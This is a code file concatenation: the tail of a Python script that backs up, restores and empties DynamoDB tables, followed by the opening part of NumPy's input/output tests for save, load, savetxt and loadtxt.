original_write_capacity = RESTORE_WRITE_CAPACITY
# ensure that read capacity is at least RESTORE_READ_CAPACITY
if original_read_capacity < RESTORE_READ_CAPACITY:
read_capacity = RESTORE_WRITE_CAPACITY
else:
read_capacity = original_read_capacity
if original_read_capacity == 0:
original_read_capacity = RESTORE_READ_CAPACITY
# override GSI write capacities if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
original_gsi_write_capacities = []
original_gsi_read_capacities = []
if table_global_secondary_indexes is not None:
for gsi in table_global_secondary_indexes:
# keeps track of original gsi write capacity units. If provisioned capacity is 0, set to
# RESTORE_WRITE_CAPACITY as fallback given that 0 is not allowed for write capacities
original_gsi_write_capacity = gsi["ProvisionedThroughput"][
"WriteCapacityUnits"
]
if original_gsi_write_capacity == 0:
original_gsi_write_capacity = RESTORE_WRITE_CAPACITY
original_gsi_write_capacities.append(original_gsi_write_capacity)
if gsi["ProvisionedThroughput"]["WriteCapacityUnits"] < int(write_capacity):
gsi["ProvisionedThroughput"]["WriteCapacityUnits"] = int(write_capacity)
# keeps track of original gsi read capacity units. If provisioned capacity is 0, set to
# RESTORE_READ_CAPACITY as fallback given that 0 is not allowed for read capacities
original_gsi_read_capacity = gsi["ProvisionedThroughput"][
"ReadCapacityUnits"
]
if original_gsi_read_capacity == 0:
original_gsi_read_capacity = RESTORE_READ_CAPACITY
original_gsi_read_capacities.append(original_gsi_read_capacity)
if (
gsi["ProvisionedThroughput"]["ReadCapacityUnits"]
< RESTORE_READ_CAPACITY
):
gsi["ProvisionedThroughput"][
"ReadCapacityUnits"
] = RESTORE_READ_CAPACITY
# temp provisioned throughput for restore
table_provisioned_throughput = {
"ReadCapacityUnits": int(read_capacity),
"WriteCapacityUnits": int(write_capacity),
}
if not args.dataOnly:
logging.info(
"Creating "
+ destination_table
+ " table with temp write capacity of "
+ str(write_capacity)
)
optional_args = {}
if table_local_secondary_indexes is not None:
optional_args["LocalSecondaryIndexes"] = table_local_secondary_indexes
if table_global_secondary_indexes is not None:
optional_args["GlobalSecondaryIndexes"] = [
prepare_gsi_for_restore(gsi) for gsi in table_global_secondary_indexes
]
while True:
try:
dynamo.create_table(
AttributeDefinitions=table_attribute_definitions,
TableName=table_table_name,
KeySchema=table_key_schema,
ProvisionedThroughput=table_provisioned_throughput,
**optional_args
)
break
except dynamo.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying creation of " + destination_table + ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, "
"retrying creation of " + destination_table + ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, destination_table, "created")
elif not args.skipThroughputUpdate:
# update provisioned capacity
if int(write_capacity) > original_write_capacity:
update_provisioned_throughput(
dynamo, destination_table, original_read_capacity, write_capacity, False
)
if not args.schemaOnly:
# read data files
logging.info("Restoring data for " + destination_table + " table..")
data_file_list = os.listdir(
dump_data_path + os.sep + source_table + os.sep + DATA_DIR + os.sep
)
data_file_list.sort()
for data_file in data_file_list:
logging.info("Processing " + data_file + " of " + destination_table)
items = []
item_data = json.load(
open(
dump_data_path
+ os.sep
+ source_table
+ os.sep
+ DATA_DIR
+ os.sep
+ data_file
)
)
items.extend(item_data["Items"])
# batch write data
put_requests = []
while len(items) > 0:
put_requests.append({"PutRequest": {"Item": items.pop(0)}})
# flush every MAX_BATCH_WRITE
if len(put_requests) == MAX_BATCH_WRITE:
logging.debug(
"Writing next "
+ str(MAX_BATCH_WRITE)
+ " items to "
+ destination_table
+ ".."
)
batch_write(
dynamo,
BATCH_WRITE_SLEEP_INTERVAL,
destination_table,
put_requests,
)
del put_requests[:]
# flush remainder
if len(put_requests) > 0:
batch_write(
dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests
)
if not args.skipThroughputUpdate:
# revert to original table write capacity if it has been modified
if (
int(write_capacity) != original_write_capacity
or int(read_capacity) != original_read_capacity
):
update_provisioned_throughput(
dynamo,
destination_table,
original_read_capacity,
original_write_capacity,
False,
)
# loop through each GSI to check if it has changed and update if necessary
if table_global_secondary_indexes is not None:
gsi_data = []
for gsi in table_global_secondary_indexes:
wcu = gsi["ProvisionedThroughput"]["WriteCapacityUnits"]
rcu = gsi["ProvisionedThroughput"]["ReadCapacityUnits"]
original_gsi_write_capacity = original_gsi_write_capacities.pop(0)
original_gsi_read_capacity = original_gsi_read_capacities.pop(0)
if (
original_gsi_write_capacity != wcu
or original_gsi_read_capacity != rcu
):
gsi_data.append(
{
"Update": {
"IndexName": gsi["IndexName"],
"ProvisionedThroughput": {
"ReadCapacityUnits": int(
original_gsi_read_capacity
),
"WriteCapacityUnits": int(
original_gsi_write_capacity
),
},
}
}
)
if gsi_data:
logging.info(
"Updating "
+ destination_table
+ " global secondary indexes write and read capacities as necessary.."
)
while True:
try:
dynamo.update_table(
TableName=destination_table,
GlobalSecondaryIndexUpdates=gsi_data,
)
break
except dynamo.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + ".."
)
time.sleep(sleep_interval)
# wait for table to become active
wait_for_active_table(dynamo, destination_table, "active")
logging.info(
"Restore for "
+ source_table
+ " to "
+ destination_table
+ " table completed. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
else:
logging.info(
"Empty schema of "
+ source_table
+ " table created. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
def main():
"""
Entrypoint to the script
"""
global args, sleep_interval, start_time
# parse args
parser = argparse.ArgumentParser(
description="Simple DynamoDB backup/restore/empty."
)
parser.add_argument(
"-a",
"--archive",
help="Type of compressed archive to create." "If unset, don't create archive",
choices=["zip", "tar"],
)
parser.add_argument(
"-b",
"--bucket",
help="S3 bucket in which to store or retrieve backups." "[must already exist]",
)
parser.add_argument(
"-m",
"--mode",
help="Operation to perform",
choices=["backup", "restore", "empty"],
)
parser.add_argument(
"-r",
"--region",
help="AWS region to use, e.g. 'us-west-1'. "
"Can use AWS_DEFAULT_REGION for local testing. Use '"
+ LOCAL_REGION
+ "' for local DynamoDB testing",
)
parser.add_argument(
"--host", help="Host of local DynamoDB [required only for local]"
)
parser.add_argument(
"--port", help="Port of local DynamoDB [required only for local]"
)
parser.add_argument(
"--accessKey", help="Access key of local DynamoDB " "[required only for local]"
)
parser.add_argument(
"--secretKey", help="Secret key of local DynamoDB " "[required only for local]"
)
parser.add_argument(
"-p",
"--profile",
help="AWS credentials file profile to use. Allows you to use a "
"profile instead accessKey, secretKey authentication",
)
parser.add_argument(
"-s",
"--srcTable",
help="Source DynamoDB table name to backup or restore from, "
"use 'tablename*' for wildcard prefix selection or '*' for "
"all tables. Mutually exclusive with --tag",
)
parser.add_argument(
"-d",
"--destTable",
help="Destination DynamoDB table name to backup or restore to, "
"use 'tablename*' for wildcard prefix selection "
"(defaults to use '-' separator) [optional, defaults to source]",
)
parser.add_argument(
"--prefixSeparator",
help="Specify a different prefix separator, " "e.g. '.' [optional]",
)
parser.add_argument(
"--noSeparator",
action="store_true",
help="Overrides the use of a prefix separator for backup wildcard "
"searches [optional]",
)
parser.add_argument(
"--readCapacity",
help="Change the temp read capacity of the DynamoDB table to backup "
"from [optional]",
)
parser.add_argument(
"-t",
"--tag",
help="Tag to use for identifying tables to back up. "
"Mutually exclusive with srcTable. Provided as KEY=VALUE",
)
parser.add_argument(
"--writeCapacity",
help="Change the temp write capacity of the DynamoDB table to restore "
"to [defaults to " + str(RESTORE_WRITE_CAPACITY) + ", optional]",
)
parser.add_argument(
"--schemaOnly",
action="store_true",
default=False,
help="Backup or restore the schema only. Do not backup/restore data. "
"Can be used with both backup and restore modes. Cannot be used with "
"the --dataOnly [optional]",
)
parser.add_argument(
"--dataOnly",
action="store_true",
default=False,
help="Restore data only. Do not delete/recreate schema [optional for "
"restore]",
)
parser.add_argument(
"--noConfirm",
action="store_true",
default=False,
help="Don't ask for confirmation before deleting existing schemas.",
)
parser.add_argument(
"--skipThroughputUpdate",
action="store_true",
default=False,
help="Skip updating throughput values across tables [optional]",
)
parser.add_argument(
"--dumpPath",
help="Directory to place and search for DynamoDB table "
"backups (defaults to use '" + str(DATA_DUMP) + "') [optional]",
default=str(DATA_DUMP),
)
parser.add_argument(
"--log", help="Logging level - DEBUG|INFO|WARNING|ERROR|CRITICAL " "[optional]"
)
args = parser.parse_args()
# set log level
log_level = LOG_LEVEL
if args.log is not None:
log_level = args.log.upper()
logging.basicConfig(level=getattr(logging, log_level))
# Check to make sure that --dataOnly and --schemaOnly weren't simultaneously specified
if args.schemaOnly and args.dataOnly:
logging.info("Options --schemaOnly and --dataOnly are mutually exclusive.")
sys.exit(1)
# instantiate connection
if args.region == LOCAL_REGION:
conn = _get_aws_client(
service="dynamodb",
access_key=args.accessKey,
secret_key=args.secretKey,
region=args.region,
)
sleep_interval = LOCAL_SLEEP_INTERVAL
else:
if not args.profile:
conn = _get_aws_client(
service="dynamodb",
access_key=args.accessKey,
secret_key=args.secretKey,
region=args.region,
)
sleep_interval = AWS_SLEEP_INTERVAL
else:
conn = _get_aws_client(
service="dynamodb",
profile=args.profile,
region=args.region,
)
sleep_interval = AWS_SLEEP_INTERVAL
# don't proceed if connection is not established
if not conn:
logging.info("Unable to establish connection with dynamodb")
sys.exit(1)
# set prefix separator
prefix_separator = DEFAULT_PREFIX_SEPARATOR
if args.prefixSeparator is not None:
prefix_separator = args.prefixSeparator
if args.noSeparator is True:
prefix_separator = None
# do backup/restore
start_time = datetime.datetime.now().replace(microsecond=0)
if args.mode == "backup":
matching_backup_tables = []
if args.tag:
# Use Boto3 to find tags. Boto3 provides a paginator that makes searching ta
matching_backup_tables = get_table_name_by_tag(
args.profile, args.region, args.tag
)
elif args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(
conn, args.srcTable, prefix_separator
)
elif args.srcTable:
matching_backup_tables.append(args.srcTable)
if len(matching_backup_tables) == 0:
logging.info("No matching tables found. Nothing to do.")
sys.exit(0)
else:
logging.info(
"Found "
+ str(len(matching_backup_tables))
+ " table(s) in DynamoDB host to backup: "
+ ", ".join(matching_backup_tables)
)
try:
if args.srcTable.find("*") == -1:
do_backup(conn, args.read_capacity, tableQueue=None)
else:
do_backup(conn, args.read_capacity, matching_backup_tables)
except AttributeError:
# Didn't specify srcTable if we get here
q = Queue()
threads = []
for i in range(MAX_NUMBER_BACKUP_WORKERS):
t = threading.Thread(
target=do_backup,
args=(conn, args.readCapacity),
kwargs={"tableQueue": q},
)
t.start()
threads.append(t)
time.sleep(THREAD_START_DELAY)
for table in matching_backup_tables:
q.put(table)
q.join()
for i in range(MAX_NUMBER_BACKUP_WORKERS):
q.put(None)
for t in threads:
t.join()
try:
logging.info("Backup of table(s) " + args.srcTable + " completed!")
except (NameError, TypeError):
logging.info(
"Backup of table(s) "
+ ", ".join(matching_backup_tables)
+ " completed!"
)
if args.archive:
if args.tag:
for table in matching_backup_tables:
dump_path = args.dumpPath + os.sep + table
did_archive, archive_file = do_archive(args.archive, dump_path)
if args.bucket and did_archive:
do_put_bucket_object(
args.profile, args.region, args.bucket, archive_file
)
else:
did_archive, archive_file = do_archive(args.archive, args.dumpPath)
if args.bucket and did_archive:
do_put_bucket_object(
args.profile, args.region, args.bucket, archive_file
)
elif args.mode == "restore":
if args.destTable is not None:
dest_table = args.destTable
else:
dest_table = args.srcTable
# If backups are in S3 download and extract the backup to use during restoration
if args.bucket:
do_get_s3_archive(
args.profile, args.region, args.bucket, args.srcTable, args.archive
)
if dest_table.find("*") != -1:
matching_destination_tables = get_table_name_matches(
conn, dest_table, prefix_separator
)
delete_str = ": " if args.dataOnly else " to be deleted: "
logging.info(
"Found "
+ str(len(matching_destination_tables))
+ " table(s) in DynamoDB host"
+ delete_str
+ ", ".join(matching_destination_tables)
)
threads = []
for table in matching_destination_tables:
t = threading.Thread(
target=delete_table, args=(conn, sleep_interval, table)
)
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
matching_restore_tables = get_restore_table_matches(
args.srcTable, prefix_separator
)
logging.info(
"Found "
+ str(len(matching_restore_tables))
+ " table(s) in "
+ args.dumpPath
+ " to restore: "
+ ", ".join(matching_restore_tables)
)
threads = []
for source_table in matching_restore_tables:
if args.srcTable == "*":
t = threading.Thread(
target=do_restore,
args=(
conn,
sleep_interval,
source_table,
source_table,
args.writeCapacity,
),
)
else:
t = threading.Thread(
target=do_restore,
args=(
conn,
sleep_interval,
source_table,
change_prefix(
source_table,
args.srcTable,
dest_table,
prefix_separator,
),
args.writeCapacity,
),
)
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info(
"Restore of table(s) "
+ args.srcTable
+ " to "
+ dest_table
+ " completed!"
)
else:
delete_table(
conn=conn, sleep_interval=sleep_interval, table_name=dest_table
)
do_restore(
dynamo=conn,
sleep_interval=sleep_interval,
source_table=args.srcTable,
destination_table=dest_table,
write_capacity=args.writeCapacity,
)
elif args.mode == "empty":
if args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(
conn, args.srcTable, prefix_separator
)
logging.info(
"Found "
+ str(len(matching_backup_tables))
+ " table(s) in DynamoDB host to empty: "
+ ", ".join(matching_backup_tables)
)
threads = []
for table in matching_backup_tables:
t = threading.Thread(target=do_empty, args=(conn, table))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Empty of table(s) " + args.srcTable + " completed!")
else:
do_empty(conn, args.srcTable)
if __name__ == "__main__":
main()
|
test_io.py
|
from __future__ import division, absolute_import, print_function
import sys
import gzip
import os
import threading
import shutil
import contextlib
from tempfile import mkstemp, mkdtemp, NamedTemporaryFile
import time
import warnings
import gc
from io import BytesIO
from datetime import datetime
import numpy as np
import numpy.ma as ma
from numpy.lib._iotools import (ConverterError, ConverterLockError,
ConversionWarning)
from numpy.compat import asbytes, asbytes_nested, bytes, asstr
from nose import SkipTest
from numpy.ma.testutils import (
TestCase, assert_equal, assert_array_equal,
assert_raises, assert_raises_regex, run_module_suite
)
from numpy.testing import assert_warns, assert_, build_err_msg
@contextlib.contextmanager
def tempdir(change_dir=False):
tmpdir = mkdtemp()
yield tmpdir
shutil.rmtree(tmpdir)
class TextIO(BytesIO):
"""Helper IO class.
Writes encode strings to bytes if needed, reads return bytes.
This makes it easier to emulate files opened in binary mode
without needing to explicitly convert strings to bytes in
setting up the test data.
"""
def __init__(self, s=""):
BytesIO.__init__(self, asbytes(s))
def write(self, s):
BytesIO.write(self, asbytes(s))
def writelines(self, lines):
BytesIO.writelines(self, [asbytes(s) for s in lines])
MAJVER, MINVER = sys.version_info[:2]
IS_64BIT = sys.maxsize > 2**32
def strptime(s, fmt=None):
"""This function is available in the datetime module only
from Python >= 2.5.
"""
if sys.version_info[0] >= 3:
return datetime(*time.strptime(s.decode('latin1'), fmt)[:3])
else:
return datetime(*time.strptime(s, fmt)[:3])
class RoundtripTest(object):
def roundtrip(self, save_func, *args, **kwargs):
"""
save_func : callable
Function used to save arrays to file.
file_on_disk : bool
If true, store the file on disk, instead of in a
string buffer.
save_kwds : dict
Parameters passed to `save_func`.
load_kwds : dict
Parameters passed to `numpy.load`.
args : tuple of arrays
Arrays stored to file.
"""
save_kwds = kwargs.get('save_kwds', {})
load_kwds = kwargs.get('load_kwds', {})
file_on_disk = kwargs.get('file_on_disk', False)
if file_on_disk:
# Do not delete the file on windows, because we can't
# reopen an already opened file on that platform, so we
# need to close the file and reopen it, implying no
# automatic deletion.
if sys.platform == 'win32' and MAJVER >= 2 and MINVER >= 6:
target_file = NamedTemporaryFile(delete=False)
else:
target_file = NamedTemporaryFile()
load_file = target_file.name
else:
target_file = BytesIO()
load_file = target_file
arr = args
save_func(target_file, *arr, **save_kwds)
target_file.flush()
target_file.seek(0)
if sys.platform == 'win32' and not isinstance(target_file, BytesIO):
target_file.close()
arr_reloaded = np.load(load_file, **load_kwds)
self.arr = arr
self.arr_reloaded = arr_reloaded
def check_roundtrips(self, a):
self.roundtrip(a)
self.roundtrip(a, file_on_disk=True)
self.roundtrip(np.asfortranarray(a))
self.roundtrip(np.asfortranarray(a), file_on_disk=True)
if a.shape[0] > 1:
# neither C nor Fortran contiguous for 2D arrays or more
self.roundtrip(np.asfortranarray(a)[1:])
self.roundtrip(np.asfortranarray(a)[1:], file_on_disk=True)
def test_array(self):
a = np.array([], float)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], float)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], int)
self.check_roundtrips(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
self.check_roundtrips(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
self.check_roundtrips(a)
def test_array_object(self):
if sys.version_info[:2] >= (2, 7):
a = np.array([], object)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], object)
self.check_roundtrips(a)
# Fails with UnpicklingError: could not find MARK on Python 2.6
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
self.roundtrip(a)
@np.testing.dec.knownfailureif(sys.platform == 'win32', "Fail on Win32")
def test_mmap(self):
a = np.array([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
a = np.asfortranarray([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
self.check_roundtrips(a)
class TestSaveLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
assert_equal(self.arr[0], self.arr_reloaded)
assert_equal(self.arr[0].dtype, self.arr_reloaded.dtype)
assert_equal(self.arr[0].flags.fnc, self.arr_reloaded.flags.fnc)
class TestSavezLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
for n, arr in enumerate(self.arr):
reloaded = self.arr_reloaded['arr_%d' % n]
assert_equal(arr, reloaded)
assert_equal(arr.dtype, reloaded.dtype)
assert_equal(arr.flags.fnc, reloaded.flags.fnc)
@np.testing.dec.skipif(not IS_64BIT, "Works only with 64bit systems")
@np.testing.dec.slow
def test_big_arrays(self):
L = (1 << 31) + 100000
a = np.empty(L, dtype=np.uint8)
with tempdir() as tmpdir:
tmp = os.path.join(tmpdir, "file.npz")
np.savez(tmp, a=a)
del a
npfile = np.load(tmp)
a = npfile['a']
npfile.close()
def test_multiple_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
self.roundtrip(a, b)
def test_named_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = BytesIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(a, l['file_a'])
assert_equal(b, l['file_b'])
def test_savez_filename_clashes(self):
# Test that issue #852 is fixed
# and savez functions in multithreaded environment
def writer(error_list):
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
arr = np.random.randn(500, 500)
try:
np.savez(tmp, arr=arr)
except OSError as err:
error_list.append(err)
finally:
os.remove(tmp)
errors = []
threads = [threading.Thread(target=writer, args=(errors,))
for j in range(3)]
for t in threads:
t.start()
for t in threads:
t.join()
if errors:
raise AssertionError(errors)
def test_not_closing_opened_fid(self):
# Test that issue #2178 is fixed:
# verify could seek on 'loaded' file
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
fp = open(tmp, 'wb')
np.savez(fp, data='LOVELY LOAD')
fp.close()
fp = open(tmp, 'rb', 10000)
fp.seek(0)
assert_(not fp.closed)
_ = np.load(fp)['data']
assert_(not fp.closed)
# must not get closed by .load(opened fp)
fp.seek(0)
assert_(not fp.closed)
finally:
fp.close()
os.remove(tmp)
def test_closing_fid(self):
# Test that issue #1517 (too many opened files) remains closed
# It might be a "weak" test since failed to get triggered on
# e.g. Debian sid of 2012 Jul 05 but was reported to
# trigger the failure on Ubuntu 10.04:
# http://projects.scipy.org/numpy/ticket/1517#comment:2
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
fp = open(tmp, 'wb')
np.savez(fp, data='LOVELY LOAD')
fp.close()
# We need to check if the garbage collector can properly close
# numpy npz file returned by np.load when their reference count
# goes to zero. Python 3 running in debug mode raises a
# ResourceWarning when file closing is left to the garbage
# collector, so we catch the warnings. Because ResourceWarning
# is unknown in Python < 3.x, we take the easy way out and
# catch all warnings.
with warnings.catch_warnings():
warnings.simplefilter("ignore")
for i in range(1, 1025):
try:
np.load(tmp)["data"]
except Exception as e:
msg = "Failed to load data from a file: %s" % e
raise AssertionError(msg)
finally:
os.remove(tmp)
def test_closing_zipfile_after_load(self):
# Check that zipfile owns file and can close it.
# This needs to pass a file name to load for the
# test.
with tempdir() as tmpdir:
fd, tmp = mkstemp(suffix='.npz', dir=tmpdir)
os.close(fd)
np.savez(tmp, lab='place holder')
data = np.load(tmp)
fp = data.zip.fp
data.close()
assert_(fp.closed)
class TestSaveTxt(TestCase):
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
fmt = "%.18e"
c = BytesIO()
np.savetxt(c, a, fmt=fmt)
c.seek(0)
assert_equal(c.readlines(),
[asbytes((fmt + ' ' + fmt + '\n') % (1, 2)),
asbytes((fmt + ' ' + fmt + '\n') % (3, 4))])
a = np.array([[1, 2], [3, 4]], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'1\n', b'2\n', b'3\n', b'4\n'])
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = BytesIO()
np.savetxt(c, a, delimiter=',', fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1,2\n', b'3,4\n'])
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = BytesIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), [b'01 2.0\n', b'03 4.0\n'])
# A single multiformat string
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Specify delimiter, should be overiden
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Bad fmt, should raise a ValueError
c = BytesIO()
assert_raises(ValueError, np.savetxt, c, a, fmt=99)
def test_header_footer(self):
"""
Test the functionality of the header and footer keyword argument.
"""
c = BytesIO()
a = np.array([(1, 2), (3, 4)], dtype=np.int)
test_header_footer = 'Test header / footer'
# Test the header keyword argument
np.savetxt(c, a, fmt='%1d', header=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('# ' + test_header_footer + '\n1 2\n3 4\n'))
# Test the footer keyword argument
c = BytesIO()
np.savetxt(c, a, fmt='%1d', footer=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n# ' + test_header_footer + '\n'))
# Test the commentstr keyword argument used on the header
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
header=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes(commentstr + test_header_footer + '\n' + '1 2\n3 4\n'))
# Test the commentstr keyword argument used on the footer
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
footer=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n' + commentstr + test_header_footer + '\n'))
def test_file_roundtrip(self):
f, name = mkstemp()
os.close(f)
try:
a = np.array([(1, 2), (3, 4)])
np.savetxt(name, a)
b = np.loadtxt(name)
assert_array_equal(a, b)
finally:
os.unlink(name)
def test_complex_arrays(self):
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re + 1.0j * im
# One format only
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e')
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n',
b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n'])
# One format for each real and imaginary part
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e' * 2 * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n',
b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n'])
# One format for each complex number
c = BytesIO()
np.savetxt(c, a, fmt=['(%.3e%+.3ej)'] * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n',
b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n'])
def test_custom_writer(self):
class CustomWriter(list):
def write(self, text):
self.extend(text.split(b'\n'))
w = CustomWriter()
a = np.array([(1, 2), (3, 4)])
np.savetxt(w, a)
b = np.loadtxt(w)
assert_array_equal(a, b)
class TestLoadTxt(TestCase):
def test_record(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_array_equal(x, a)
d = TextIO()
d.write('M 64.0 75.0\nF 25.0 60.0')
d.seek(0)
mydescriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
b = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=mydescriptor)
y = np.loadtxt(d, dtype=mydescriptor)
assert_array_equal(y, b)
def test_array(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=np.int)
a = np.array([[1, 2], [3, 4]], int)
assert_array_equal(x, a)
c.seek(0)
x = np.loadtxt(c, dtype=float)
a = np.array([[1, 2], [3, 4]], float)
assert_array_equal(x, a)
def test_1D(self):
c = TextIO()
c.write('1\n2\n3\n4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
c = TextIO()
c.write('1,2,3,4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
def test_missing(self):
c = TextIO()
c.write('1,2,3,,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)})
a = np.array([1, 2, 3, -999, 5], int)
assert_array_equal(x, a)
def test_converters_with_usecols(self):
c = TextIO()
c.write('1,2,3,,5\n6,7,8,9,10\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)},
usecols=(1, 3,))
a = np.array([[2, -999], [7, 9]], int)
assert_array_equal(x, a)
def test_comments(self):
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments='#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_skiprows(self):
c = TextIO()
c.write('comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_usecols(self):
a = np.array([[1, 2], [3, 4]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1,))
assert_array_equal(x, a[:, 1])
a = np.array([[1, 2, 3], [3, 4, 5]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1, 2))
assert_array_equal(x, a[:, 1:])
# Testing with arrays instead of tuples.
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
assert_array_equal(x, a[:, 1:])
# Checking with dtypes defined converters.
data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
c = TextIO(data)
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
arr = np.loadtxt(c, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(arr['stid'], [b"JOE", b"BOB"])
assert_equal(arr['temp'], [25.3, 27.9])
def test_fancy_dtype(self):
c = TextIO()
c.write('1,2,3.0\n4,5,6.0\n')
